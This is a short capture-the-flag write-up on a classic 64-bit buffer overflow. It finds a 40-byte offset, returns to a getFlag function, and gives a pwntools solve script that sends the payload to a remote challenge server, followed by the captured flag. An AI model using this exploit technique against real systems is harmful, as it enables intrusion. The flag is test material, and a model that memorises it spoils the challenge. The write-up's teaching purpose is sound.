Classic Bufferoverflow

Solution

I think this is the trickiest challenge I have ever faced.

When i run the program, it will show something like ltrace or strace command.

First of all when facing a buffer overflow challenge, find the offset which for this challenge is 40 bytes.

Next, I went through the code using gdb-gef and I found 3 functions, main, getFlag and getInput.

The target is the function getFlag, obviously to give me the flag. So, i get the address of the function which is 0x00000000004011d6 and use the same technique in challenge Don't Overboard 2.

So, i made a simple script to ease my life

solve.py

from pwn import *
context.bits=64
conn = ELF('./challenge.bin')

rem=remote('3.26.44.175',3336)

offset=40
addr=0x004011d6

payload=b"a"*offset
payload+=p64(addr)

rem.sendline(payload)
rem.interactive()

Just run it and the flag is already served.

Flag

CURTIN_CTF{B4S1C_0V3RF10W}

Last updated 1 year ago